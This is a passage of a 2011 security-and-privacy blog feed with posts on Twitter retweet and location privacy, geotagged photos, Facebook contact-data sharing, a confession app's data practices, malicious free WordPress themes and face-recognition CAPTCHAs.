<blockquote>Currently, no consensus exists for the definition of "sensitive data" in data protection and privacy law either in the EU or the USA. However, given the status of both regions as major trading partners it is essential in the digital age that such consensus is formed soon while legislation is in a transitional period. Consistent legislation would not only protect consumers and sellers, but also improve confidence across the whole of e-commerce and mobile computing.</blockquote><br />
That's perfectly true and reasonable. But I'm less thrilled about the example of why it might be sensitive:<br />
<br />
<blockquote>Jessen points out in what particular situation geo-tracking might be most sensitive. "The intrusion and loss of integrity related to the processing of geographic location data are apparent when customers are subject to constant monitoring or when geographic location data are combined with other sensitive or demographic data, such as the location of bars, casinos, red-light districts," she says. She adds that "Personal profiles are established for behavioural advertising purposes on this basis." Even anonymised location data might compromise and individual's privacy, so it too must be subsumed in new privacy legislation.</blockquote><br />
Red light districts? Once again, <a href="http://webinsecurity.blogspot.com/2010/08/privacy-not-just-for-people-who-are.html">privacy is not just for people who have something to hide</a>, news writers and legislators. Surely, someone can come up with some other convincing reasons for geodata to be sensitive that don't make it sound like you're protecting only compulsive gamblers, alcoholics, and others who could be conceived of as doing something not entirely socially appealing? Especially if you're then going to try to convince the US to provide consistent legislation, it seems some other examples could be helpful in making the case.Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-1268122723860452912011-03-31T09:00:00.109-04:002011-04-07T10:28:46.002-04:00Comprehensive Guide to Twitter Privacy: Where are you?<h1>Comprehensive Guide to Twitter Privacy</h1><br />
I've become fascinated with how Twitter has such simple settings, and yet Twitter privacy is in many ways quite complex, so I'm starting to put all of this information together. This is part 2 of... a bunch. <br />
<br />
[<a href="http://webinsecurity.blogspot.com/2011/03/comprehensive-guide-to-twitter-privacy.html">Part 1: Who hears what you say?</a>]<br />
[<a href="http://webinsecurity.blogspot.com/2011/03/comprehensive-guide-to-twitter-privacy_31.html">Part 2: Where are you?</a>] <-- you are here!
<p><br />
<br />
<br />
Now read on to learn <strong>How your iPhone may be letting people know where you live</strong> and what being responsible about sharing your location really entails!<br />
<br />
<h2>Part 2: Where are you?</h2><p>A year ago, I talked about <a href="http://webinsecurity.blogspot.com/2010/02/foursquare-for-thieves-and-privacy.html">How Foursquare can help people steal your stuff</a>. Someone had set up a handy site called <a href="http://pleaserobme.com">PleaseRobMe.com</a> which let you search to find out who in a given area wasn't at home based on their Foursquare checkins. (The site now says the the authors have made their point about oversharing and have disabled the search.) <p>The point being that while sharing your location can be a neat way to meet up with friends, it can also be used in dangerous ways. So whether it's Foursquare, Yelp, Facebook Places, Google Latitude, or Twitter, you need to think about what you're sharing and why. <h3>Twitter's built-in location settings</h3><p>At the time I wrote about PleaseRobMe.com, I don't think location was built into Twitter, but it's since been made an option for any Twitter post. I have to say, that I really love how twitter has done to make this option clear... including doing their best to make it possible to recover from an "oops" moment where you realise you've been sharing waaay too much information and want to delete all the location data to be safe: <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjJ17EX4vvO1bvGwf21MyeZu4t4bjAVQN5wRRgQDrZ-QVqunjzaphJRvzRKv4lYX6JRbaDKDYEjqmbgUEapb15orrNeRtovLayG_P_hyphenhyphenYyxvdeS31LTecIpG0sdz13BNTtHcoB-xjfiSU/s1600/twitterlocation.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="166" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjJ17EX4vvO1bvGwf21MyeZu4t4bjAVQN5wRRgQDrZ-QVqunjzaphJRvzRKv4lYX6JRbaDKDYEjqmbgUEapb15orrNeRtovLayG_P_hyphenhyphenYyxvdeS31LTecIpG0sdz13BNTtHcoB-xjfiSU/s400/twitterlocation.png" /></a></div>They've also done a nice job with the <a href="http://support.twitter.com/forums/26810/entries/78525">"Learn more" help document</a>, which includes the following message: <blockquote><strong>Be cautious and careful about the amount of information you share online.</strong> There may be some updates where you want to share your location ("The parade is starting now." or "A truck just spilled delicious candy all over the roadway!"), and some updates where you want to keep your location private. <strong>Just like you might not want to tweet your home address, please be cautious in tweeting coordinates you don't want others to see.</strong></blockquote><p>That pretty much sums up the advice any security/privacy expert would give you, although the <a href="http://support.twitter.com/forums/26810/entries/78525">complete document</a> also explains how to turn things on and off, when one might prefer a precise location and when one might prefer just the city, etc. <p>But just like with <a href="http://webinsecurity.blogspot.com/2011/03/comprehensive-guide-to-twitter-privacy.html">the tweet privacy settings we talked about in part 1</a>, this isn't the only way your location can be shared. Only this time, we're not going to blame your followers... we're going to blame your camera. <h3>How your iPhone may be telling everyone where you live</h3><p>Many modern smartphones and cameras, including the iPhone, have a GPS built-in such that you can store location data with every photo. That's pretty cool when it comes to sorting photos later, but because this information is stored with a photo, each picture you share could potentially tell someone exactly where you are (or were when you took the photo). <p>In <a href="http://www.usenix.org/events/hotsec10/tech/full_papers/Friedland.pdf">Cybercasing the Joint: On the Privacy Implications of Geo-Tagging</a>, Friedland and Sommer started looking at how many people share location data, whether they did so in unsafe ways, and whether they were aware of what information they were sharing. I highly recommend you flip through <a href="http://www.usenix.org/events/hotsec10/tech/slides/friedland.pdf">their HotSec presentation</a> to look at the examples. (Even better if you can catch them presenting -- I really enjoyed seeing that presentation in person! -- but the slides are pretty informative on their own.) <br />
<br />
<p>My favourite one involves William Shatner accidentally revealing a "secret" studio location when he posted about recording there! And perhaps more relevant to "cybercasing the joint" are the craigslist posts that show expensive items, their exact geolocation, and the list of times when someone will be at home to take a phone call from an interested buyer. <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMdHLVnyjsJSaWcQWoO4TXenxpP-h-_-IfOqgYtLRS9jZRX-qE3rGIdrTLLNJZ9WewzS-rsHunkN3N3cM-vqk75mcfjwJt067DPxExKOPRVXpIrOhn0WA4lvZm3x93m_FCZ1ZpdxnN7Ng/s1600/twitpic.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="155" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMdHLVnyjsJSaWcQWoO4TXenxpP-h-_-IfOqgYtLRS9jZRX-qE3rGIdrTLLNJZ9WewzS-rsHunkN3N3cM-vqk75mcfjwJt067DPxExKOPRVXpIrOhn0WA4lvZm3x93m_FCZ1ZpdxnN7Ng/s400/twitpic.png" /></a></div><p>The issue here is that geodata is often recorded by default. And it can even be dangerous to share this information. As a parent, how would you feel if you realized your teenage daughter had been taking photos of herself in her bedroom and it turned out that any predator could figure out where she lived? How do you feel about the fact that your friends' photos from your last party may have told everyone on the internet where you live? <div class="separator" style="clear: both; text-align: center;"><a href="http://www.flickr.com/photos/lalakis/3238750109/" title="Untitled by Lauren Lakis, on Flickr"><img src="http://farm4.static.flickr.com/3257/3238750109_be60c05e14_m.jpg" width="240" height="127" alt=""></a></div><p>Many photo services, such as Twitpic and Flickr, allow you to generalize your data so that it shows up as being in a city without showing precisely where within that city. But if you choose to have it visible (or just don't hide the data), you can often get a nice map where you can zoom in: <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_FYCfzjs2fLwxgbR2XrGpHuIJPKQhmtsw84xFh_UDzn3875ctBw5qKAgfhkJhAsRVNHrlPcE7T9jZj4ZCtVzYN70cOIDL-qZaOCswwk-8znxNLyzdgL-5GzTjqK5MS1tMkmA9xhimeV4/s1600/flickr-map.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="178" width="319" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_FYCfzjs2fLwxgbR2XrGpHuIJPKQhmtsw84xFh_UDzn3875ctBw5qKAgfhkJhAsRVNHrlPcE7T9jZj4ZCtVzYN70cOIDL-qZaOCswwk-8znxNLyzdgL-5GzTjqK5MS1tMkmA9xhimeV4/s400/flickr-map.png" /></a></div><p>On Flickr you can view the exif data (Exchangeable image file format -- basically extended meta-information for pictures of the photo) and get the coordinates there... <div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBTLEuhmJFRICbXvx1KvnOc9EPIb-E-9vsxr5skMy2qr7XywbtA2Vvcqrdxm5IhrSVmUahjm-BPWxToX8gJ0ZmdAz87kAq1nEO3awtPBUb_6U31qAYTbDIGEm59z3LO5Blbwnwl81UMV4/s1600/flickr-gps.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="142" width="377" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhBTLEuhmJFRICbXvx1KvnOc9EPIb-E-9vsxr5skMy2qr7XywbtA2Vvcqrdxm5IhrSVmUahjm-BPWxToX8gJ0ZmdAz87kAq1nEO3awtPBUb_6U31qAYTbDIGEm59z3LO5Blbwnwl81UMV4/s400/flickr-gps.png" /></a></div><p>All ready for someone's stalking pleasure! <p><h3>The moral of this story</h3><p>Sharing your location can be scary, and protecting your location privacy doesn't stop at turning off location on Twitter or refusing to sign in to Foursquare/Facebook places/Yelp. If you don't want everyone to know exactly where you are, you also have to make sure your camera and your friends' cameras aren't giving the game away.<br />
<br />
<p>Stay tuned for more Twitter privacy posts in April! And in case you missed it, here's [<a href="http://webinsecurity.blogspot.com/2011/03/comprehensive-guide-to-twitter-privacy.html">Part 1: Who hears what you say?</a>] which talks about tweet privacy.Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-85160585793075042992011-03-07T18:00:00.028-05:002011-03-31T13:54:53.560-04:00Comprehensive Guide to Twitter Privacy: Who hears what you say?<h1>Comprehensive Guide to Twitter Privacy</h1><br />
I've become fascinated with how Twitter has such simple settings, and yet Twitter privacy is in many ways quite complex, so I'm starting to put all of this information together. This is part 1 of... many.<br />
<br />
[<a href="http://webinsecurity.blogspot.com/2011/03/comprehensive-guide-to-twitter-privacy.html">Part 1: Who hears what you say?</a>] <-- you are here!
[<a href="http://webinsecurity.blogspot.com/2011/03/comprehensive-guide-to-twitter-privacy_31.html">Part 2: Where are you?</a>]<br />
<br />
Note that many of the things I'm saying here are true of other social networks or any place you might share information online, but I decided this would be most readable with examples from one site, so I've decided to use Twitter, which I like and use regularly.<br />
<br />
<h2>Part 1: Who hears what you say?</h2><br />
On the surface, Twitter has perhaps the simplest privacy policy of any social network:<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRfLAbDTXuAsFa1Cd9hH8NsZYrIR1tzzYeiywpSDqOt9z7riCKvTR-sXwRT1jhC6233HNNIZBMhYsLsZsWnLjN8ep4dYfeAp8d71DBMUXYhQpGxNioCLxpF9-PsbeLodMPPJUKtFMdqcI/s1600/twitterprivacy.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="88" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiRfLAbDTXuAsFa1Cd9hH8NsZYrIR1tzzYeiywpSDqOt9z7riCKvTR-sXwRT1jhC6233HNNIZBMhYsLsZsWnLjN8ep4dYfeAp8d71DBMUXYhQpGxNioCLxpF9-PsbeLodMPPJUKtFMdqcI/s400/twitterprivacy.png" width="400" /></a></div><br />
Either everyone can read your tweets (everything you say on twitter is public) or you can make your feed private (and then maintain a list of people who are allowed to see it). <br />
<br />
You also, regardless of which option you choose, have the option of blocking individuals from following you. Blocking someone isn't hugely effective if they can then log out and read your public feed anyhow, but it can cut down on spam.<br />
<br />
<h3>Retweeting</h3><br />
Blocking everyone you don't know is not necessarily the end of the story. Just like gossip, anyone who can read what you've said can also share it. It's fairly common in twitter parlance to "retweet" a message: that is, repeat the message verbatim or sometimes with small edits for length or the addition of commentary. <br />
<br />
When you have a public account, retweeting is pretty much harmless behaviour. Anyone could see that funny thing you said if they looked, so if one of your followers retweets it, you're really just winding up with a few more strangers seeing it than you might otherwise. But they could have looked at that tweet at any time if they so chose. Often it's a really positive thing: more people get to hear about a cause you believe in or something cool you've done. <br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1fz-cAhFFzqMtj-XWH0x2XA5TBtVslZUiRaNdpsLR8LBhyphenhyphenXEeYOMrCFph5Cl1AuSckbuMhQQAmjvhlEIKbyFOMwlOcI5WFu4CSfSKm64JXRWUKpOxmVjuyFsFTkXtYnt1WNFOUEw1Acw/s1600/retweet.png" imageanchor="1" style="margin-left:1em; margin-right:1em"><img border="0" height="130" width="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1fz-cAhFFzqMtj-XWH0x2XA5TBtVslZUiRaNdpsLR8LBhyphenhyphenXEeYOMrCFph5Cl1AuSckbuMhQQAmjvhlEIKbyFOMwlOcI5WFu4CSfSKm64JXRWUKpOxmVjuyFsFTkXtYnt1WNFOUEw1Acw/s400/retweet.png" /></a></div><br />
However, the story can be quite different if you have a private account. Perhaps you have chosen to keep your account private because you and your boss don't share political views. That "funny" thing you said could become seriously awkward if she winds up seeing it retweeted. Probably you chose to make your account private for a reason, and retweets can violate your expectation of privacy.<br />
<br />
<h3>Violating privacy with retweets?</h3><br />
There's actual a whole paper on this subject that appeared in Web 2.0 Security and Privacy 2010. It has the cheesy-cute title <a href="http://w2spconf.com/2010/papers/p28.pdf">RT @IWantPrivacy: Widespread Violation of Privacy Settings in the Twitter Social Network</a>. They found that while some clients did block users from retweeting private feeds, many didn't and of course users could always just type RT and repeat the whole message anyhow. <b>The researchers collected 4.42 million tweets that were exposing private information</b> in this manner, and they expect that the numbers will continue to climb. <br />
<br />
It's hard to tell, however, whether those millions of exposed tweets were really problematic for the people who wound up exposed, however. Perhaps millions of people asked before retweeting (something you should always do before sharing private information, but I know even I forget to do this sometimes when telling a good story I heard, so I suspect retweeting is no different). Perhaps most of the tweets were cute pictures of cats that no one really minded sharing. But either way, you should be aware of what you retweet and aware of what you say that could be retweeted.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://www.flickr.com/photos/josefdunne/4319306255/" title="RETWEET @josef (Experiment) by Josef Dunne, on Flickr"><img src="http://farm3.static.flickr.com/2707/4319306255_13bfe7562b_m.jpg" width="240" height="160" alt="RETWEET @josef (Experiment)" /></a></div><br />
<h3>Retweeting lies</h3><br />
It's also worth noting that even though researchers assumed that most of those tweets were actual privacy exposures, it's equally possible that many of them were made up. If someone can type RT and your name and cut and paste in the message, there's no reason that it has to be <em>your</em> message that they post in. Often edits are minor, but there's nothing stopping one from going <code>RT @twitter we hate kittens</code> or something significantly more damaging to someone's reputation. Without a public feed, it's hard to refute since no one can check what you said, and even with a public feed people may expect that you deleted the offending message. <a href="http://www.rttnews.com/Content/EntertainmentNews.aspx?Section=2&Id=1569700&SM=1">A recent defamation lawsuit</a> in the US may serve as a reminder that what you say and what you seem to say on twitter could have real implications.<br />
<br />
So that little checkbox? It's clearly not the end of the story.<br />
<br />
Stay tuned for Part 2 next week!<br />
<br />
[<a href="http://webinsecurity.blogspot.com/2011/03/comprehensive-guide-to-twitter-privacy.html">Part 1: Who hears what you say?</a>] <-- you are here!
[<a href="http://webinsecurity.blogspot.com/2011/03/comprehensive-guide-to-twitter-privacy_31.html">Part 2: Where are you?</a>]Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-26381668109603900772011-03-01T11:26:00.005-05:002011-03-01T11:35:56.047-05:00News: Facebook still going to share your address/phone # with external sites<div style="float: right; margin-left: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/terrio/4920679942/" title="Old Facebook home page"><img src="http://farm5.static.flickr.com/4073/4920679942_8efb2881b2_m.jpg" alt="Old Facebook home page" style="border: solid 2px #000000;" /></a><br /> <span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/terrio/4920679942/">Old Facebook home page</a> <br />by <a href="http://www.flickr.com/photos/terrio/">Terriko</a>.</span></div>Over a month ago, I wrote <a href="http://webinsecurity.blogspot.com/2011/01/facebook-enabling-annoying-phone-calls.html">Facebook now enabling annoying phone calls and paper junk mail?</a> and shortly thereafter they pulled the plan. <br />
<br />
But <a href="http://www.huffingtonpost.com/2011/02/28/facebook-home-addresses-phone-numbers_n_829459.html">it sounds like it's back on the table</a>, along with <a href="http://gadgetwise.blogs.nytimes.com/2011/03/01/facebook-facelifts-its-privacy-policy/?src=busln">an updated privacy policy format</a>.<br />
<br />
Given that anyone can buy a targeted Facebook advertisement, is this going to lead to new levels of stalking and general harassment from "adveritisers" who think it's totally worth a few bucks to get the phone #s of all the women who they might find attractive in their metro area? Awkward.<br />
<br />
As usual, I recommend not having private contact information available in Facebook for your own safety.Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com2tag:blogger.com,1999:blog-8281035461329714656.post-20691174649598575472011-02-15T09:00:00.003-05:002011-02-15T09:00:44.744-05:00To whom are you confessing?Many people have been abuzz over the <a href="http://itunes.apple.com/us/app/confession-a-roman-catholic/id416019676?mt=8&ls=1">iPhone Confession App</a> which even <a href="http://www.bbc.co.uk/news/technology-12391129">received approval from the church</a>.<br />
<br />
The <a href="http://www.priv.gc.ca/">Office of the Privacy Commissioner of Canada</a> <a href="http://blog.privcom.gc.ca/index.php/2011/02/09/fess-up-where-does-my-data-go/">isn't ready to give the app their blessing</a>, though:<br />
<br />
<blockquote><div style="float: right; margin-left: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/jessgarduno/4748397648/" title="Confessions"><img src="http://farm5.static.flickr.com/4098/4748397648_c7e1bf29fd_m.jpg" alt="Confessions" style="border: solid 2px #000000;" /></a><br />
<span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/jessgarduno/4748397648/">Confessions</a> <br />
by <a href="http://www.flickr.com/photos/jessgarduno/">jess.g.</a>.</span></div>One of the selling points of the app appears to be the password-protection feature, enabling you to lock out anyone who may try to find out about your sinnin’ ways. But what seems to be missing is what Little iApps, the developer of Confession, will do with the data they collect. According to reports, the app asks users to also provide information on their age, sex and marital status – paired with detailed information on the user’s transgressions, that’s a potentially detailed profile that would be quite attractive to marketers and others.<br />
<br />
Details on the collection and use of the user-provided data wasn’t available on Little iApps’ site…so if the developer is collecting and using information without the user knowing, does that mean they’ve broken one of the commandments themselves – “Thou shalt not steal”?</blockquote><br />
Read their entire blog post entitled <a href="http://blog.privcom.gc.ca/index.php/2011/02/09/fess-up-where-does-my-data-go/">‘Fess up – where does my data go?</a>Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-57785105581122683822011-02-14T16:21:00.001-05:002011-02-14T16:23:38.196-05:00Free Wordpress themes considered harmfulIt used to be that you could tell what was likely to give your computer a virus: if you stayed away from the porn and "free screensavers" then you were pretty much ok. Nowadays, though, with cross-site scripting, it's <a href="http://www.cgisecurity.com/xss-faq.html#xss">much harder to gauge which content might be unsafe</a>.<br />
<br />
So <a href="http://wpmu.org/why-you-should-never-search-for-free-wordpress-themes-in-google-or-anywhere-else/">Why You Should Never Search For Free WordPress Themes in Google or Anywhere Else</a> caught my eye because it's a new example of how free... sometimes isn't. Why bother to exploit people's wordpress blogs, which is illegal in many places, when you can just give them the code and let them install and run it themselves? Mostly it looks like the code found is all about adding spammy SEO-boosting links for dubious properties, but there could definitely be worse elsewhere in those themes: that free theme could be using your blog to install malicious software on your visitors' computers!<br />
<br />
<blockquote>Out of the ten sites on the first page of Google, here are the stats:<br />
<br />
Safe: 1<br />
Iffy: 1<br />
Avoid: 8<br />
8 out of 10 sites included base64 encoding in their themes. The average WordPress user no doubt knows that Google isn’t the best place to find themes but the stats on these sites show that there are thousands of people downloading them and using them on their websites. Someone who has come to WordPress on the first time is more than likely to type “free WordPress themes” into Google to find a site that gives them what they want. Unfortunately they’re more than likely to end up with spammy links, at best, on their site.</blockquote><br />
<a href="http://wpmu.org/why-you-should-never-search-for-free-wordpress-themes-in-google-or-anywhere-else/">Read the whole article</a> to hear about what might be hiding in that free template you just downloaded. Basically, if you see a bunch of random encoded stuff that you don't understand, you should be awfully wary... Thankfully, the author demonstrates the use of two tools for figuring out if that theme you'd like ot try is safe: <a href="http://wordpress.org/extend/plugins/tac/">Theme Authenticity Checker</a> and <a href="http://wordpress.org/extend/plugins/exploit-scanner/">Exploit scanner</a>. I guess those are the new antivirus for Wordpress?Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-719266122024751032011-01-27T13:30:00.005-05:002011-01-27T13:56:13.217-05:00Will Facebook's choice of social authentication (face CAPTCHAs) lead to huge gains in facial recognition software?<div style="float: right; margin-left: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/terrio/3965517702/in/set-72157622470561898/" title="The CU-WISE women - me + cactus at GHC09"><img src="http://farm4.static.flickr.com/3017/3965517702_3a1d318c46_m.jpg" alt="The CU-WISE women - me + cactus at GHC09" style="border: solid 2px #000000;" /></a><br />
<span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/terrio/3965517702/in/set-72157622470561898/">Some of my friends, <br />
for your future hacking pleasure</a> <br />
by <a href="http://www.flickr.com/photos/terrio/">Terriko</a>.</span></div>We've actually talked about this sort of thing considerably within my research group, so it's hardly a new idea, but it's still interesting because I hadn't heard of a large scale implementation of this before: <a href="http://www.readwriteweb.com/archives/nevermind_captcha_facebook_asks_if_you_know_your_f.php">Nevermind CAPTCHA, Facebook Asks If You Know Your Friends</a>.<br />
<br />
They're calling it "social authentication" where rather than reading obfuscated text as in a normal CAPTCHA, you're asked to identify friends.<br />
<br />
<blockquote>"Instead of showing you a traditional captcha on Facebook, one of the ways we may help verify your identity is through social authentication," writes Rice. "We will show you a few pictures of your friends and ask you to name the person in those photos. Hackers halfway across the world might know your password, but they don't know who your friends are."</blockquote><br />
Of course, that's not true at all. For many people with public profiles, flickr accounts, etc. it's pretty easy for a hacker to identify your friends. (Even easier if your would-be hacker is a jilted lover or angry sibling, but presumably those folk could also pass a regular CAPTCHA.) The key here isn't that this social authentication isn't hackable, though, it's that the hack has to be more carefully crafted to your account, and may well require a human to do the facial recognition necessary, thus slowing down the attack and doing exactly what CAPTCHAs were intended to do.<br />
<br />
I'm curious to see how well it works in practice, though. CAPTCHAs in their current "mangled text" form relied on assumptions about the ineffectiveness computer text recognition... assumptions that have been rapidly broken as determined attackers and researchers have improved our text recognition algorithms. (Nowadays, many captchas can be bypassed with a higher than 90% success rate. <a href="http://homepages.cs.ncl.ac.uk/jeff.yan/msn_draft.pdf">Here's a link to one such paper</a> but a websearch will turn up many others.)<br />
<br />
<div style="float: left; margin-right: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/terrio/3471843153/in/set-72157617189505867/" title="Sci-Fi Spectacular-2618"><img src="http://farm4.static.flickr.com/3658/3471843153_02c0691fdf_m.jpg" alt="Sci-Fi Spectacular-2618" style="border: solid 2px #000000;" /></a><br />
<span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/terrio/3471843153/in/set-72157617189505867/">Friends in costume</a> <br />
by <a href="http://www.flickr.com/photos/terrio/">Terriko</a>.</span></div>So the interesting question to me is "Will Facebook's choice of Face CAPTCHAs lead to huge gains in facial recognition software?" -- we're well overdue for gains in that area, actually, given that law enforcement is hoping to use facial recognition to stop crime and even terrorism, but the technology is so poor right now that if they used it now they'd likely be arresting a lot of innocent folk. Facebook will lead to some great cases: What about when your friends are in costumes? Wearing different makeup? Different lighting? Different poses? Different hair? <br />
<br />
Beyond the usual halloween costumes, my facebook friends include theatre geeks, haunted house aficionados, <a href="http://www.flickr.com/photos/terrio/3690173413/in/set-72157620859973927/">members of the 501st legion of Star Wars costumers</a> and folk involved with things like the Society for Creative Anachronism. Will my friends' and acquaintances' penchant for elabourate costumes mean that I'm more secure? Or will it mean that I'll have more trouble identifying them in photos unless I've seen their standard costumes before?<br />
<br />
Mostly I'm torn between excitement at new gains in image processing and a vague sense of unease when I contemplate the potential applications of better facial recognition software.Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com2tag:blogger.com,1999:blog-8281035461329714656.post-51707066469575087122011-01-27T09:00:00.004-05:002011-01-27T09:00:14.858-05:00"My account got hacked"Some <a href="http://twitter.com/#!/jeremiahg/status/29554919937679360">bite-sized wisdom</a> from <a href="http://twitter.com/#!/jeremiahg">Jeremiah Grossman</a>:<br />
<br />
<blockquote>Funny how people, "my account got hacked," rather than "someone hacked into my account", like they think getting hacked is an act of nature.</blockquote><br />
I had a good laugh, but it's got me wondering... given how frequently attacks occur online, maybe it really does make sense for people to conceptualize attacks as something that just happens as opposed to something more akin to "that guy robbed me." Makes it easier to deal with somehow, or perhaps easier to accept that there will likely be no retribution?<br />
<br />
And more disturbingly, does this "act of nature" approach to hacking explain the general public's sometimes apathetic response to routine privacy violations, both online and offline?Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com3tag:blogger.com,1999:blog-8281035461329714656.post-4528960371236288572011-01-26T05:29:00.001-05:002011-01-26T14:44:54.453-05:00Zuckerberg... hacked?There's <a href="http://techcrunch.com/2011/01/25/zuckerberg-fan-page-hack/">an amusing story up on TechCrunch suggesting that Mark Zuckerberg's fan page may have been hacked</a>.<br />
<br />
<blockquote>Obviously, Zuckerberg didn’t actually write it. Or at least, we’re pretty sure he didn’t. Instead, it would appear that his fan page was hacked. Facebook has now taken down the page — but not before we grabbed a screenshot.</blockquote><br />
Honestly, these things happen. But what made the story actually funny to me was <a href="http://twitter.com/#!/snipeyhead/status/30147681712078848">this tweet</a>:<br />
<br />
<blockquote><a href="http://twitter.com/#!/snipeyhead/">@snipeyhead</a> Hah. FB is flagging the Tech Crunch article reporting on Zuckerberg's fan page hack as "abusive or spammy" <a href="http://twitpic.com/3thf68">http://twitpic.com/3thf68</a> #classy</blockquote><br />
Edit: More news on what happened according to Facebook: <a href="http://news.cnet.com/8301-27080_3-20029630-245.html">Facebook blames bug for Zuckerberg page hack</a>Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-22494387691185619372011-01-26T03:05:00.000-05:002011-01-26T03:05:19.435-05:00Ethical hacking? How about some ethical writing?<a href="http://www.amazon.ca/gp/product/1598634143?ie=UTF8&tag=terriko-20&linkCode=as2&camp=15121&creative=390961&creativeASIN=1598634143"><img border="0" src="http://terri.zone12.com/blog/books/51K-2SuJHXL._SL160_.jpg" align="right" style="margin: 1em" /></a><img src="http://www.assoc-amazon.ca/e/ir?t=terriko-20&l=as2&o=15&a=1598634143" width="1" height="1" border="0" alt="" style="border:none !important; margin:0px !important;" align="right" /><br />
Now, I haven't verified this at all, but here's an interesting link for you: <a href="http://attrition.org/errata/charlatan/ankit_fadia/network_intrusion/">Ankit Fadia / Manu Zacharia - "Network Intrusion Alert" Heavily Plagiarized</a>.<br />
<br />
<blockquote>An extremely detailed analysis has been performed for the first chapter (10 pages) to show the scope and method of plagiarism. Our analysis shows that roughly 90% of the first chapter, including the six graphics used, has been taken from other sources. Due to time constraints, notes are used for brevity for the rest of the material.</blockquote><br />
Given my experiences with plagiarism among my undergraduate students and the recent <a href="http://howpublishingreallyworks.com/?p=3450">Cooks Source plagarism story</a> (which attracted <a href="http://www.wired.com/threatlevel/2010/11/web-decries-infringement/">quite a lot of attention</a>)... I'm sadly inclined to believe that this entire book may be plagiarized.<br />
<br />
What's funny about this story is that the book in contention here is titled "Network Intrusion Alert: An <em>Ethical</em> Hacking Guide to Intrusion Detection." Emphasis mine.Terri Odahttp://www.blogger.com/profile/10462169521890966235noreply@blogger.com0tag:blogger.com,1999:blog-8281035461329714656.post-9982379649082423202011-01-17T23:06:00.004-05:002011-01-17T23:10:29.456-05:00Facebook now enabling annoying phone calls and paper junk mail?<div style="float: right; margin-left: 10px; margin-bottom: 10px;"><a href="http://www.flickr.com/photos/80327698@N00/5013086426/" title="Drowning in Verizon junk mail"><img src="http://farm5.static.flickr.com/4154/5013086426_467c4eb4a0_m.jpg" alt="Drowning in Verizon junk mail" style="border: solid 2px #000000;" /></a><br />
<span style="font-size: 0.9em; margin-top: 0px;"><br />
<a href="http://www.flickr.com/photos/80327698@N00/5013086426/">Drowning in Verizon junk mail</a> <br />
by <a href="http://www.flickr.com/photos/80327698@N00/">Night-thing</a>.</span></div><a href="http://nakedsecurity.sophos.com/2011/01/16/rogue-facebook-apps-access-your-home-address-mobile-phone-number/">Sophos</a> points out that Facebook has made yet another change to the way it handles your information: this time, <a href="http://developers.facebook.com/blog/post/446?_fb_noscript=1">allowing third-party developers access to contact information</a> on Facebook.<br />
<br />
Now, part of me wants to just shrug: it's always been <em>technically</em> possible for third party developers to get access to this information because of the current state of web security. It's long been true that anyone who can execute JavaScript in your browser on a site (e.g. every facebook app) can gain access to anything you can see. So if your friend installed FarmVille and you've allowed your friend to see your phone number, FarmVille can see your phone number (and the pictures of you in that horrible halloween costume, and that drunken post you made on your ex's wall...). And if you install FarmVille, they can even more easily glean your phone number and anything else on your profile. What Facebook's doing is in some ways good: they're helping to make this clear to users, and maybe even helping to track who is actually looking at and using that info.<br />
<br />
But of course, most people aren't aware that this has always been possible, so they're suddenly envisioning FarmVille sending them paper brochures filled with new crop info, or phoning all their friends to ask why they haven't helped out on the farm lately. Maybe an automated call would help convince you to join the game and seek out that lost kitten?<br />
<br />
